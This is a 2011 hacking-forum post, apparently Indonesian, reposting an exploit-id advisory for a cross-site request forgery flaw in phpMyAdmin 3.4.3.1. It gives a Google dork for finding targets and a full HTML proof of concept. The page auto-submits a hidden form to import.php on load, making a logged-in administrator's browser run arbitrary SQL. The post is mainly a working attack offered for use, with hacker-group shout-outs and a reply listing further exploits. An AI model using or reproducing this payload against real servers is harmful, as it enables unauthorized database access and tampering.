PhpMyadmin XSRF Vuln (Execute SQL Query)

Subyek: PhpMyadmin XSRF Vuln (Execute SQL Query) Sat Aug 13, 2011 11:40 pm

Quote :: =====================================================================
.__ .__ __ .__ .___
____ ___ _________ | | ____ |__|/ |_ |__| __| _/
_/ __ \\ \/ /\____ \| | / _ \| \ __\ ______ | |/ __ |
\ ___/ > < | |_> > |_( <_> ) || | /_____/ | / /_/ |
\___ >__/\_ \| __/|____/\____/|__||__| |__\____ |
\/ \/|__| \/
Exploit-ID is the Exploit Information Disclosure

Web : exploit-id.com
e-mail : root[at]exploit-id[dot]com

#########################################
I'm Caddy-Dz, member of Exploit-Id
#########################################
======================================================================
####
# Exploit Title: PhpMyadmin XSRF Vuln (Execute SQL Query)
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com | Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: inurl:/phpmyadmin/
# Category:: Webapps
# Tested on: [Windows Seven Edition Intégral- French]
####
# | >> -------+++=[ Dz Offenders Cr3w ]=+++----- << |
# | Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * ...|
# | ----------------------------------------------- |
# + All Dz .. This is Open Group 4 L33T Dz Hax3rZ ..
####

[+] Note :

Only the request executed by the root,users (Server)

[+] Tested on : EasyPhp 5.4alpha2

-Apache 2.2.19
-MySQL 5.5.13
-PhpMyAdmin 3.4.3.1
-Xdebug 2.1.1

[+] Video:

https://www.youtube.com/watch?v=xJH_ujBNTVY

[*] ExpLo!T :

<html>
<head>

</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
var count = 1;
var i=0;

for(i=0; i<count; i++)
{
document.forms[i].submit();
}
}

</script>
<form method="post" action="http://127.0.0.1/home/mysql/import.php" enctype="multipart/form-data" class="ajax" id="sqlqueryform" name="sqlform">
<input type="hidden" name="is_js_confirmed" value="0" />
<input type="hidden" name="token" value="47cd4b47756bd497165c6fc7f87d2182" /> <<== make sure you put the right value
<input type="hidden" name="pos" value="0" />
<input type="hidden" name="goto" value="server_sql.php" />
<input type="hidden" name="message_to_show" value="Votre requête SQL a été exécutée avec succès" />
<input type="hidden" name="prev_sql_query" value="" />
<textarea type="hidden" tabindex="100" name="sql_query" id="sqlquery" cols="40" rows="30" dir="ltr">Your SQL Query;</textarea>
<input type="hidden" name="bkm_label" value="" />
<input type="hidden" name="bkm_all_users" value="true" />
<input type="hidden" name="bkm_replace" value="true" />
<input type="hidden" name="sql_delimiter" value=";" /> ]
<input type="hidden" name="show_query" value="1" checked="checked" />
</form>

####

[+] Peace From Algeria

####

=================================**Algerians Hackers**=======================================|

Subyek: Re: PhpMyadmin XSRF Vuln (Execute SQL Query) Thu Aug 18, 2011 4:50 pm

comot sambil di pelajarin :cystg

» SQL Query
» phpMyAdmin 3.5.2.2 server_sync.php Backdoor
» phpMyAdmin 3.x Swekey Remote Code Injection Exploit
» B2B Trading Marketplace Vuln
» Jasa Scan Vuln Server..